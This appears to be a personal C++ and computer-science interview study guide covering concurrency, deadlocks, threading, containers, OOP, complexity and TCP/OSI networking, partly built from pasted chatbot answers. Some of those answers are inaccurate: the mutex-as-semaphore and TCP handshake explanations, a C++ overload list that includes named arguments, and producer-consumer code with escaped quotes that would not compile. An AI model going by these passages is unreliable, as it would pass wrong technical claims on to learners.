Invariants are important because they can help identify errors or bugs in a system. If an invariant is violated, it means that something in the system is not working as expected and needs to be fixed. They also provide a way to verify the correctness of a system, as any changes that violate the invariants can be identified and corrected.

Overall, invariants play a crucial role in understanding and analyzing systems and processes, and they are essential tools for ensuring their correctness and stability.

Idempotence

A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.
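
A trivial sketch of the difference:

// Idempotent: calling it once or a hundred times leaves the same state.
void turn_on(bool& light) { light = true; }

// Not idempotent: every call changes the outcome.
void toggle(bool& light) { light = !light; }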

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: A race condition in computer science refers to a situation where the outcome or behavior of a system depends on the timing or sequence of events, and different outcomes or behaviors can occur depending on which event occurs first. This can lead to unexpected or incorrect behavior of the system.

One common example of a race condition is when multiple processes or threads access and modify a shared resource without proper synchronization. If the timing of these accesses is not controlled, it can lead to conflicts and inconsistencies in the shared resource, resulting in incorrect behavior of the system.

Another example is in concurrent programming, where multiple processes or threads are running simultaneously and accessing shared data. If these processes are not properly synchronized, they can interfere with each other’s operations and cause unexpected results.

Race conditions can also occur in distributed systems, where multiple nodes are communicating and sharing data. If the communication is not synchronized, it can lead to conflicts and inconsistencies in the shared data, resulting in incorrect behavior of the system.

In general, race conditions can occur in any situation where there is shared access to a resource or when multiple processes are interacting and their behavior is dependent on the timing of events. They can be difficult to identify and debug, making them a common source of errors and bugs in computer systems. Proper synchronization and careful design can help prevent race conditions and ensure the correct behavior of a system.

Considerations

Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed, and they remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item again and the livelock continues.

OpenAI: Both deadlocks and livelocks are types of concurrency issues that can occur in multi-threaded programs. They both involve situations where threads are unable to make progress, but there are some key differences between them.

Deadlocks occur when two or more threads are blocked and unable to continue because they are waiting for each other to release a resource that they both need. This creates a circular dependency and the threads will remain blocked indefinitely unless the issue is resolved externally. In other words, the threads are "deadlocked" with each other.

On the other hand, livelocks occur when two or more threads are constantly changing their states in response to each other, but are unable to make any real progress. This can happen when the threads are trying to be polite and avoid conflicts, but end up getting stuck in a loop of constantly trying to give way to each other. In a livelock, the threads are not blocked, but they are not making any progress either.

In summary, the key differences between deadlocks and livelocks are:

  1. Cause: Deadlocks are caused by threads waiting for each other’s resources, while livelocks are caused by threads trying to be polite and avoid conflicts.

  2. State: In a deadlock, threads are blocked and unable to make progress, while in a livelock, threads are constantly changing their states but not making any progress.

  3. Resolution: Deadlocks can only be resolved externally by breaking the circular dependency, while livelocks can be resolved by implementing a different strategy for thread interaction.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.

OpenAI:

  1. Use a lock ordering hierarchy: To avoid deadlocks, establish a lock ordering hierarchy where locks are acquired in a specific order. This will prevent two threads from trying to acquire the same set of locks in a different order and potentially causing a deadlock.

  2. Limit lock acquisition time: Set a timeout for how long a thread can hold a lock. If the thread is unable to complete its task within the allotted time, it will release the lock and allow other threads to acquire it.

  3. Use thread-safe data structures: Thread-safe data structures have built-in mechanisms to prevent multiple threads from accessing them at the same time. This can help avoid deadlocks caused by multiple threads trying to access the same data.

  4. Avoid nested locks: Nested locks occur when a thread tries to acquire a lock while holding another lock. This can lead to deadlocks if the second lock is already held by another thread. To avoid this, try to limit the use of nested locks or use a lock-free algorithm.

  5. Use a deadlock detection algorithm: Some programming languages and operating systems have built-in deadlock detection algorithms that can identify and resolve deadlocks. Make use of these tools to help prevent and detect deadlocks in your code.

  6. Avoid long-running transactions: Long-running transactions that hold locks for extended periods of time can increase the chances of deadlocks occurring. Consider breaking up long transactions into smaller, more manageable chunks to reduce the likelihood of deadlocks.

  7. Test and debug your code: It’s important to thoroughly test and debug your code to identify potential deadlocks. Use debugging tools and techniques to identify and resolve any potential issues before they become a problem in a production environment.

See also

Additionally

Synchronising threads

OpenAI: Mutex and semaphore are both synchronization mechanisms used in multi-threaded programming to control access to shared resources. They both ensure that only one thread can access a shared resource at a time, preventing race conditions and data corruption.

  1. Purpose: Mutex (Mutual Exclusion) is used to protect a shared resource from being accessed simultaneously by multiple threads. It allows only one thread to acquire the lock and access the resource, while other threads wait for the lock to be released.

Semaphore is used to control the number of threads that can access a shared resource at a given time. It maintains a counter and allows a fixed number of threads to access the resource simultaneously. Once the maximum limit is reached, other threads are put on hold until a thread releases the semaphore.

  2. Implementation: Mutex is typically implemented using a binary semaphore, where the lock is acquired by setting the semaphore count to 1 and released by setting it back to 0. It uses a simple locking mechanism and has a lower overhead compared to a semaphore.

Semaphore, on the other hand, uses a counter to keep track of the number of threads accessing the resource. It uses wait and signal operations to acquire and release the semaphore. Wait operation decreases the counter and if it reaches 0, the thread is put on hold until the semaphore is signaled and the counter is increased.

  3. Usage: Mutex is commonly used in situations where only one thread should access a resource at a time, such as critical sections, shared data structures, and resources with limited access.

Semaphore is used in scenarios where a limited number of threads should have access to a resource, such as a pool of resources or a producer-consumer problem.

  4. Ownership: Mutex has a concept of ownership, which means that the thread that acquired the lock is responsible for releasing it. This is useful in preventing deadlocks where a thread forgets to release the lock.

Semaphore does not have the concept of ownership and any thread can release the semaphore, making it more prone to deadlocks.

  5. Performance: Mutex has a lower overhead compared to semaphore due to its simple implementation. This makes it more efficient in situations where only one thread needs access to a resource at a time.

Semaphore has a slightly higher overhead due to its counter and wait/signal operations. However, it is more suitable for scenarios where a fixed number of threads need to access a resource simultaneously.

In conclusion, mutex and semaphore serve different purposes and have different implementations. They are both important synchronization mechanisms that help ensure thread safety and prevent data corruption in multi-threaded environments.

See Mutex vs Semaphore.

This is getting into the weeds, but mutexes and the data they protect can happily be declared consecutively in the code; so consider what this might mean when both the mutex and the data end up in the same cache line.
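
One way to reason about this – a sketch only; std::hardware_destructive_interference_size is C++17 but compiler support varies, hence the fallback – is to align independently updated mutex/data pairs to separate cache lines so threads working on different pairs do not invalidate each other:

#include <cstddef>
#include <mutex>
#include <new> // std::hardware_destructive_interference_size

#ifdef __cpp_lib_hardware_interference_size
inline constexpr std::size_t cache_line = std::hardware_destructive_interference_size;
#else
inline constexpr std::size_t cache_line = 64; // a common assumption
#endif

struct Counter {
    std::mutex m;   // the mutex and the data it guards share a line: that is
    long value = 0; // fine, because a thread touches both together
};

// Keep independently updated counters on separate cache lines so threads
// incrementing different counters do not fight over the same line.
struct alignas(cache_line) PaddedCounter : Counter {};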

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

OpenAI: Threads and processes are both mechanisms used in computer operating systems to execute multiple tasks concurrently. They are both important for multitasking and improving the efficiency of a system, but they differ in their implementation and purpose.

  1. Definition Threads are lightweight units of execution within a process. They share the same memory space and resources as their parent process, but each thread has its own stack. Processes, on the other hand, are independent instances of a program that are managed by the operating system. They have their own memory space and resources, and are isolated from other processes.

  2. Creation Threads are typically created within a process by the operating system or by the parent process itself. This allows for multiple threads to share the same resources and communicate with each other easily. Processes, on the other hand, are created by the operating system when a program is launched. Each process has its own resources and is completely independent from other processes.

  3. Resource sharing Threads can share resources such as memory, files, and I/O devices with other threads within the same process. This makes them more efficient and faster than processes, as they can share data directly without inter-process communication. Processes, however, do not share resources and must use inter-process communication mechanisms such as pipes or sockets to communicate with each other.

  4. Context switching Context switching is the process of switching from one thread or process to another. In threads, context switching is faster and less expensive as it involves switching between different execution contexts within the same process. In processes, context switching is more expensive as it involves switching between different processes, which have their own memory space and resources.

  5. Scheduling Threads are scheduled by the operating system scheduler, which allocates CPU time to each thread within a process. This allows for efficient use of CPU resources and better performance. Processes are scheduled by the operating system as well, but each process is treated as a separate entity and its scheduling is not affected by other processes.

  6. Communication Threads within the same process can easily communicate with each other through shared memory and variables. They can also communicate by using synchronization mechanisms such as locks or semaphores. Processes, on the other hand, must use inter-process communication mechanisms to communicate with each other.

  7. Parallelism Threads within a process can run in parallel on multiple CPU cores, making them efficient for parallel processing. Processes can also run in parallel across cores, but because they are isolated from each other they cannot share resources directly and must communicate via inter-process mechanisms.

In conclusion, threads and processes are both important for multitasking and improving the efficiency of a system, but they differ in their implementation and purpose. Threads are used for lightweight and efficient multitasking within a process, while processes are used for isolation and communication between different programs.

Thread best practice

References


Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform-independent interface. See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick, it could actually take longer to parallelise it than to run it serially. You need to profile: how long does it take just to create a thread?

Ways to create a thread

std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. It’s quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads: they will just be executed sequentially. Additionally, exceptions thrown in the asynchronous routine destroy the future and the exception is rethrown by the calling get() routine. You ought to pass it a strategy: std::launch::async or std::launch::deferred as a first parameter.
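
A minimal sketch:

#include <future>
#include <iostream>
#include <numeric>
#include <vector>

int main() {
    const std::vector<int> v(1'000'000, 1);

    // Push the summation into the background; ask for a real thread.
    std::future<long> total = std::async(std::launch::async, [&v] {
        return std::accumulate(v.begin(), v.end(), 0L);
    });

    // ... do other work here ...

    std::cout << total.get() << '\n'; // blocks until the result is ready
                                      // (and rethrows any exception)
}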

std::thread

You need to call join() for every thread created with std::thread. This can be done by storing your threads as a vector and joining each of them in a loop.
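
For example:

#include <iostream>
#include <thread>
#include <vector>

int main() {
    std::vector<std::thread> threads;
    for (int i = 0; i < 4; ++i)
        threads.emplace_back([i] { std::cout << "thread " << i << '\n'; });

    for (auto& t : threads)
        t.join(); // every std::thread must be joined (or detached)
}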

std::jthread

Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes an additional predicate: e.g., std::replace and std::replace_if. A usage sketch follows the list below.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate
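
For example, parallelising a sort is just a matter of passing a policy (a sketch; with gcc you typically need to link against TBB for the parallel policies to actually run in parallel):

#include <algorithm>
#include <execution>
#include <random>
#include <vector>

int main() {
    std::vector<double> v(10'000'000);
    std::mt19937 gen{42};
    std::uniform_real_distribution<double> dist(0.0, 1.0);
    for (auto& x : v)
        x = dist(gen);

    // Same algorithm, opt-in parallelism. Note it offers no protection of
    // shared data: anything touched inside, say, a parallel for_each must
    // be thread safe.
    std::sort(std::execution::par, v.begin(), v.end());
}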

Acquiring resources

std::mutex

A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not becoming stuck; see the deadlock chapter for more. You can use std::scoped_lock with multiple resources or just one, but I also think it expresses intention better, by virtue of having “scope” in the name.
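
A sketch of taking two locks at once: std::scoped_lock acquires both with a deadlock-avoidance algorithm, so two threads locking the same pair of accounts in opposite orders will not deadlock.

#include <mutex>

struct Account {
    std::mutex m;
    long balance = 0;
};

void transfer(Account& from, Account& to, long amount) {
    // Locks both mutexes atomically (deadlock avoiding) and releases them
    // on scope exit.
    std::scoped_lock lock(from.m, to.m);
    from.balance -= amount;
    to.balance += amount;
}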

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <iostream>
#include <queue>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <chrono>  // durations for sleep_for
#include <cstdlib> // rand

using namespace std;

queue<int> buffer; // shared buffer
mutex mtx; // mutex for locking buffer
condition_variable cv; // conditional variable for synchronization

const int BUFFER_SIZE = 10; // buffer size
const int MAX_VALUE = 100; // maximum value for producer to produce
const int NUM_PRODUCERS = 3; // number of producers
const int NUM_CONSUMERS = 2; // number of consumers

// function for producer to produce values and add to buffer
void producer(int id) {
    while (true) {
        // generate random value
        int value = rand() % MAX_VALUE + 1;
        // lock buffer
        unique_lock<mutex> lck(mtx);
        // wait if buffer is full
        cv.wait(lck, [](){return buffer.size() < BUFFER_SIZE;});
        // add value to buffer
        buffer.push(value);
        // print message
        cout << \"Producer \" << id << \" produced value \" << value << endl;
        // notify waiting consumer
        cv.notify_one();
        // unlock buffer
        lck.unlock();
        // sleep for random time
        this_thread::sleep_for(chrono::milliseconds(rand() % 1000 + 1000));
    }
}

// function for consumer to consume values from buffer
void consumer(int id) {
    while (true) {
        // lock buffer
        unique_lock<mutex> lck(mtx);
        // wait if buffer is empty
        cv.wait(lck, [](){return buffer.size() > 0;});
        // get value from buffer
        int value = buffer.front();
        // remove value from buffer
        buffer.pop();
        // print message
        cout << \"Consumer \" << id << \" consumed value \" << value << endl;
        // notify waiting producer
        cv.notify_one();
        // unlock buffer
        lck.unlock();
        // sleep for random time
        this_thread::sleep_for(chrono::milliseconds(rand() % 1000 + 1000));
    }
}

int main() {
    // create producer threads
    thread producers[NUM_PRODUCERS];
    for (int i = 0; i < NUM_PRODUCERS; i++) {
        producers[i] = thread(producer, i);
    }
    // create consumer threads
    thread consumers[NUM_CONSUMERS];
    for (int i = 0; i < NUM_CONSUMERS; i++) {
        consumers[i] = thread(consumer, i);
    }
    // join producer threads
    for (int i = 0; i < NUM_PRODUCERS; i++) {
        producers[i].join();
    }
    // join consumer threads
    for (int i = 0; i < NUM_CONSUMERS; i++) {
        consumers[i].join();
    }
    return 0;
}

Branching

Branchless programming

Branchless programming is an important approach in low-latency code. It may offer performance improvements but potentially at the cost of maintainability.

#include <iostream>

int main() {
    int x = 10;
    int y = 20;

    // Using a branch statement
    int max_val_branch = (x > y) ? x : y;
    std::cout << "Max value using branch statement: " << max_val_branch << std::endl;

    // Using branchless programming
    int max_val_branchless = y ^ ((x ^ y) & -(x > y));
    std::cout << "Max value using branchless programming: " << max_val_branchless << std::endl;

    return 0;
}

Branch prediction

In summary, branch prediction focuses on predicting the outcome of a specific branch instruction to enable speculative execution, while branch target prediction aims to predict the target address of a branch to reduce the delay in fetching and decoding subsequent instructions. Both techniques are utilized in modern processors to optimize instruction execution and improve overall performance.

OpenAI: Branch prediction is a technique used in computer processors to improve the performance of branch instructions. Branch instructions are instructions that cause the processor to change the sequence of instructions being executed, such as conditional statements or loops.

Branch prediction works by attempting to predict the outcome of a branch instruction before it is actually executed. This prediction is based on past patterns and behavior of the program’s code. If the prediction is correct, the processor can continue executing instructions without having to wait for the branch instruction to be completed. However, if the prediction is incorrect, the processor must undo any changes made and execute the correct instructions.

There are several types of branch prediction techniques, including static and dynamic prediction. Static prediction uses simple rules or heuristics to make predictions, while dynamic prediction uses more advanced algorithms and techniques to make predictions based on past behavior. Dynamic prediction can also adapt to changes in the program’s behavior, making it more accurate than static prediction.

One of the main benefits of branch prediction is that it can significantly reduce the number of pipeline stalls in a processor. Pipeline stalls occur when the processor has to wait for a branch instruction to be completed before it can continue executing other instructions. By predicting the outcome of branch instructions, branch prediction can reduce the number of stalls and improve the overall performance of the processor.

However, branch prediction can also have drawbacks. If the prediction is incorrect, the processor must undo any changes made and execute the correct instructions, which can result in a performance decrease. Additionally, predicting the outcome of some branch instructions can be difficult, especially in complex programs with unpredictable behavior.

Overall, branch prediction is an important technique used in modern processors to improve performance by reducing pipeline stalls. It is constantly being researched and improved upon to make predictions more accurate and efficient.

C++ attributes

When the [[likely]] attribute is applied, it suggests to the compiler that the branch following the attribute is frequently executed. This allows the compiler to prioritize the optimization of code paths that are more likely to be taken, potentially resulting in better performance.

However, it’s important to note that the [[likely]] attribute is just a hint, and it does not guarantee any specific behavior or optimization. The behavior of [[likely]] can vary depending on the compiler and its version. Some compilers may ignore the attribute altogether, while others may consider it as a hint for optimization.
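
A minimal sketch of the syntax; whether the generated code actually changes is entirely down to the compiler.

#include <cstdint>

int64_t process(int64_t value) {
    if (value > 0) [[likely]] {
        // Hot path: the compiler may lay this out to fall through
        return value * 2;
    } else [[unlikely]] {
        // Cold path: error handling, rarely taken
        return -1;
    }
}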

References


Parallelism

Typically parallelism makes you think “threads within a process”, but it’s also worth considering which points in your processing pipeline could be executed or calculated in parallel.

Kinds of parallelism

The iron law of performance

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycle

Amdahl’s law

Amdahl’s law is a principle in computer architecture and performance engineering that states that the overall performance improvement of a system is limited by the speed of its non-parallelizable components. Developed by computer scientist Gene Amdahl in the 1960s, it is used to analyze the potential speedup of a system or program when adding additional resources, such as processors or cores.

The law states that the theoretical maximum speedup of a system is limited by the portion of the program that cannot be parallelized. This is also known as the "serial fraction" or "sequential fraction" of the program. In other words, if a program cannot be broken down into smaller, independent tasks that can be executed simultaneously, then the overall speed of the program will not be significantly improved by adding more processors or cores.

Mathematically, Amdahl’s law can be expressed as:

Speedup = 1 / [(1 - P) + (P / N)]

Where P is the proportion of the program that can be parallelized and N is the number of processors or cores.

For example, if 80% of a program can be parallelized and 4 processors are added, the theoretical maximum speedup would be:

Speedup = 1 / [(1 - 0.8) + (0.8 / 4)] = 1 / 0.4 = 2.5x

This means that even with 4 processors, the program can only be sped up by a maximum of 2.5 times. The remaining 20% of the program that cannot be parallelized will continue to limit the overall performance.

Amdahl’s law highlights the importance of efficient parallelization in computer systems. It also emphasizes the diminishing returns of adding more processors or cores as the non-parallelizable portion of a program becomes a larger factor. This law has been used to guide the design of multi-core processors and parallel computing systems to ensure that the benefits of parallelization are maximized.

It’s very tempting to optimise the parts you are familiar with, but it’s not obvious how much your efforts will benefit the overall process. Spend your time on the bottlenecks.


The C++ Standard Library containers

  1. Efficient and Robust Implementation: The C++ Standard Library containers are implemented by experienced developers and have gone through extensive testing and optimization. This ensures a robust and efficient implementation of data structures, making them reliable and performant.

  2. Portability: The C++ Standard Library is a cross-platform library, meaning that containers and algorithms written using it will work on any platform that supports C++. This makes them highly portable and useful for developing cross-platform applications.

  3. Wide Range of Containers: The C++ Standard Library provides a wide range of containers, including vector, list, map, set, deque, etc. These containers are suitable for various data storage and retrieval needs, allowing developers to choose the most efficient one for their use case.

  4. Uniform Interface: All containers in the C++ Standard Library have a uniform interface, making it easy to learn and use them. This uniformity also allows for easier interchangeability of containers in different parts of a program.

  5. Memory Management: The C++ Standard Library containers provide memory management capabilities, such as automatic memory allocation and deallocation, making it easier for developers to manage memory and avoid memory leaks.

  6. Standardized Algorithms: The C++ Standard Library also provides a set of algorithms that can be used with its containers, such as sorting, searching, and manipulating data. These algorithms are highly optimized and can be used with any container, making them highly versatile.

  7. High-level Abstractions: The C++ Standard Library containers provide high-level abstractions, making it easier for developers to focus on the logic of their program rather than the low-level details of data structures.

  8. Community Support: The C++ Standard Library is widely used and has a large community of developers who contribute to its development and provide support to other developers. This makes it easier for developers to find resources and solutions to their problems when using the C++ Standard Library containers.

The containers, container adaptors and container-like types themselves:

  1. vector
  2. list
  3. forward_list
  4. deque
  5. array
  6. map
  7. multimap
  8. set
  9. multiset
  10. unordered_map
  11. unordered_multimap
  12. unordered_set
  13. unordered_multiset
  14. stack
  15. queue
  16. priority_queue
  17. bitset
  18. valarray
  19. string
  20. wstring
  21. string_view
  22. span
  23. flat_map (C++23)
  24. flat_multimap (C++23)
  25. flat_set (C++23)
  26. flat_multiset (C++23)

Categories of containers

Sequence containers in C++ are data structures that store elements in a linear sequence or ordered manner. Examples of sequence containers include arrays, vectors, lists, and deques. These containers allow for efficient insertion and deletion of elements at the beginning, end, or middle of the sequence. The elements in a sequence container are accessed using an index or iterator, and the order of elements is maintained.

On the other hand, associative containers in C++ are data structures that store elements in a specific key-value pair. Examples of associative containers include maps, sets, and multi-maps. These containers allow for efficient retrieval of elements based on their associated keys. The elements in an associative container are sorted based on their key values, and the order of insertion is not preserved. These containers use a hashing or tree-based data structure to organize and access elements based on their keys.

In summary, the main difference between sequence and associative containers is the way they store and access elements. Sequence containers maintain the order of elements and allow for efficient insertion and deletion, while associative containers prioritize efficient retrieval based on keys but do not guarantee the order of elements.

Choosing a container


Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that focuses on the use of objects to represent data and functionality. It is based on the concept of objects, which have properties (attributes or data) and methods (procedures or functions) that can interact with each other.

In OOP, objects are created from classes, which act as blueprints for objects. Classes define the properties and methods that all objects of that type will have. This allows for code reusability and modularity, as objects can inherit properties and methods from their parent classes and can also be used as building blocks for more complex programs.

One of the key principles of OOP is encapsulation, which means that the properties and methods of an object are contained within the object and can only be accessed and modified through designated interfaces. This helps to keep the code organized and secure, as it prevents external code from directly accessing or changing the internal workings of an object.

Another important concept in OOP is inheritance, which allows for the creation of subclasses that inherit properties and methods from their parent classes. This allows for more specialized and specific objects to be created, while still maintaining the code reusability and structure of the parent class.

Polymorphism is also a key aspect of OOP, which refers to the ability of objects to take on different forms and behaviors depending on their context. This allows for flexibility and extensibility in code, as objects can be used in different ways without needing to be rewritten or modified.

Overall, OOP provides a powerful and efficient way to organize and manage code by breaking it down into smaller, more manageable objects with their own properties and behaviors. It is widely used in software development and is the foundation of many popular programming languages such as Java, C++, and Python.

Differences between a class and a struct

In C++, the only differences between a class and a struct are the defaults: members of a class are private by default, while members of a struct are public by default; similarly, a class inherits privately by default, while a struct inherits publicly by default.

Polymorphism

  1. Ad-hoc Polymorphism: This type of polymorphism allows a function or operator to behave differently based on the type of arguments it receives. It can be achieved through overloading or overriding, and it is often used in object-oriented programming.

  2. Parametric Polymorphism: Also known as generic polymorphism, this type allows a function or data type to be written in a way that can handle multiple data types without specifying them explicitly. This is commonly used in functional programming languages.

  3. Subtype Polymorphism: This type of polymorphism is based on inheritance, where a subclass can be used in place of its superclass. This allows objects of different types to be treated uniformly, as long as they share a common superclass.

  4. Coercion Polymorphism: This type of polymorphism involves automatically converting one type of data into another type when needed. This is commonly used in dynamically typed languages.

  5. Overriding Polymorphism: This occurs when a subclass overrides a method or property of its superclass, allowing it to modify or extend the behavior of the inherited method.

  6. Compile-time Polymorphism: Also known as static polymorphism, this type is resolved at compile time and is achieved through function overloading or operator overloading.

  7. Run-time Polymorphism: Also known as dynamic polymorphism, this type is resolved at run-time and is achieved through virtual functions and late binding. This allows objects of different types to respond differently to the same method call based on their actual type at runtime.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.
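
A minimal sketch, using the type trait mentioned above to check the property at compile time:

#include <memory>
#include <type_traits>

struct Base {
    virtual ~Base() = default; // virtual: deleting via Base* is now safe
    virtual void run() {}
};

struct Derived : Base {
    void run() override {}
};

static_assert(std::has_virtual_destructor_v<Base>);

int main() {
    // Derived::~Derived runs correctly because ~Base is virtual
    std::unique_ptr<Base> p = std::make_unique<Derived>();
}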

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

An empty non-virtual class has a size of 1 because in C++ objects can’t have zero size (objects declared consecutively can’t have the same address). A class with virtual functions has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each class that has virtual functions.
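
A minimal sketch of the size difference; the exact numbers are implementation-defined, but these are typical of a 64-bit platform.

#include <iostream>

struct plain {};                             // no virtual functions
struct poly { virtual ~poly() = default; };  // carries a vtable pointer

int main() {
    std::cout << sizeof(plain) << '\n'; // typically 1
    std::cout << sizeof(poly) << '\n';  // typically 8 on a 64-bit machine
}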

RAII

RAII (Resource Acquisition Is Initialization) is a programming pattern used in C++ that ensures proper handling of resources by tying their acquisition to the initialization of an object. It is a form of automatic resource management where the lifetime of a resource is bound to the lifetime of an object.

In RAII, a resource is acquired and initialized in the constructor of an object, and automatically released and deinitialized in the destructor. This guarantees that the resource will be properly managed and released, even in the case of exceptions or unexpected program flow.

This pattern is commonly used for managing dynamically allocated memory, file handles, database connections, and other resources that require explicit acquisition and release. It simplifies resource management and helps avoid common bugs such as memory leaks or resource leaks.

RAII is a key part of C++ programming and is often used in conjunction with smart pointers and the concept of ownership, where the object responsible for acquiring and releasing the resource is the owner of that resource. This allows for a clear and intuitive ownership model, making it easier to reason about resource management in a program.

Overall, RAII promotes good programming practices by automating resource management and reducing the likelihood of errors and bugs related to resource handling.
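
A minimal sketch of the idiom wrapping a C-style file handle (in real code std::fstream already does this for you):

#include <cstdio>
#include <stdexcept>

class file {
    std::FILE* handle_;

public:
    explicit file(const char* path) : handle_{std::fopen(path, "r")} {
        if (!handle_)
            throw std::runtime_error{"cannot open file"};
    }

    // Release the resource exactly once, even if an exception unwinds the stack
    ~file() { std::fclose(handle_); }

    // Forbid copying so two objects never own the same handle
    file(const file&) = delete;
    file& operator=(const file&) = delete;

    std::FILE* get() const { return handle_; }
};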

Overloading

Overload resolution is the process of determining which version of a function or operator should be called when there are multiple versions with the same name but different parameters. There are several strategies that can be used for overload resolution, including:

  1. Exact Match: This is the simplest strategy, where the compiler looks for an exact match between the parameters in the function call and the parameters in the function definition. If there is an exact match, that function is called. If there is no exact match, an error is thrown.

  2. Implicit Conversion: In this strategy, the compiler checks if the parameters in the function call can be implicitly converted to match the parameters in the function definition. This can include converting between different data types or using default values for optional parameters.

  3. Best Fit: This strategy considers all possible conversions and chooses the version of the function that requires the least amount of conversions. This can help prevent unexpected behavior when there are multiple versions of a function that could potentially be called.

  4. Named Arguments: Instead of relying on the order of arguments, this strategy allows for arguments to be specified by name, making it easier to call a specific version of a function that may have multiple optional parameters.

  5. Variadic Functions: This strategy allows for a variable number of arguments to be passed to a function, making it more flexible and able to handle different input scenarios.

  6. Default Arguments: This strategy allows for default values to be specified for one or more parameters in a function. If no value is provided for those parameters in the function call, the default values will be used.

  7. Access Modifiers: Overload resolution can also be affected by the access modifiers of a function. For example, if there are two versions of a function with the same name and parameters, but one is declared as private and the other as public, the private version will not be accessible outside of the class.

Overall, the choice of overload resolution strategy depends on the language and its specific rules and conventions. Some languages may use a combination of these strategies to determine the best overload for a given function call.

Complexity

You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Description Example
O(1) Constant time complexity Accessing an element in an array
O(log n) Logarithmic time complexity Binary search
O(n) Linear time complexity Finding the maximum element in an unsorted array
O(n log n) Linearithmic time complexity Sorting algorithms like Merge Sort and Quick Sort
O(n^2) Quadratic time complexity Nested loops
O(n^3) Cubic time complexity Triple nested loops
O(2^n) Exponential time complexity Naive recursive Fibonacci, subset enumeration
O(n!) Factorial time complexity Permutation algorithms

Comparing two fundamental data structures

The average complexity of linked lists and arrays can vary depending on the specific operation being performed. However, in general, linked lists tend to have a slightly higher average complexity compared to arrays.

The average complexity of an array for accessing an element by index, or inserting or deleting an element at the end, is O(1) (amortised, in the case of a dynamic array). Searching an unsorted array, however, is O(n): it may require inspecting every element.

On the other hand, the average complexity of a linked list for accessing an element by index, inserting or deleting an element at the end (without a tail pointer), and searching is O(n), where n is the number of elements in the list. This is because each of these operations requires traversing the list, which takes linear time.

However, the average complexity of a linked list can be better than an array for certain operations. For example, inserting or deleting an element at the beginning of a linked list has an average complexity of O(1), while the same operation in an array has an average complexity of O(n) because all the elements after the insertion or deletion point need to be shifted.

In summary, the average complexity of linked lists and arrays can vary depending on the specific operation, but in general, arrays have a lower average complexity for basic operations, while linked lists can have a better average complexity for certain operations.


Networking

“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer Name Function Protocols Examples
7 Application Provides network services to applications HTTP, SMTP, FTP Web browsers, email clients, FTP clients
6 Presentation Formats and translates data for the application layer SSL, JPEG, MIDI Encryption, compression, file format conversion
5 Session Establishes, manages, and terminates connections between applications NetBIOS, PPTP, NFS Remote desktop, online gaming, file sharing
4 Transport Provides reliable data transfer between hosts TCP, UDP File transfer, web browsing, email
3 Network Routes data between networks using logical addresses IP, ICMP Internet communication, routing
2 Data Link Transmits data between adjacent network nodes Ethernet, Wi-Fi Local area network communication
1 Physical Transmits raw data between devices Ethernet cables, fiber optics Electrical signals, light waves

Three way handshake

The TCP three-way handshake is the process of establishing a connection between two devices over a TCP/IP network. It is used to ensure reliable and error-free communication between the two devices.

The three steps of the TCP handshake are:

Step 1: SYN (Synchronize) The client sends a SYN packet to the server, indicating that it wants to establish a connection. This packet contains a random sequence number (SYN) that is used to initiate the connection.

Step 2: SYN-ACK (Synchronize-Acknowledge) Upon receiving the SYN packet, the server responds with a SYN-ACK packet. This packet contains the same sequence number (SYN) as well as another random sequence number (ACK) to acknowledge the request.

Step 3: ACK (Acknowledgement) Finally, the client sends an ACK packet to the server, which completes the three-way handshake. This packet contains the ACK sequence number, confirming that it has received the SYN-ACK packet.

After the three-way handshake is completed, the TCP connection is established, and both devices can begin sending data packets to each other. This process is repeated every time a new TCP connection is established between two devices. It also allows for the synchronization of sequence numbers between the two devices, ensuring that data is transmitted in the correct order and without errors.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK

What are the most difficult concepts in computer science?


Data structures

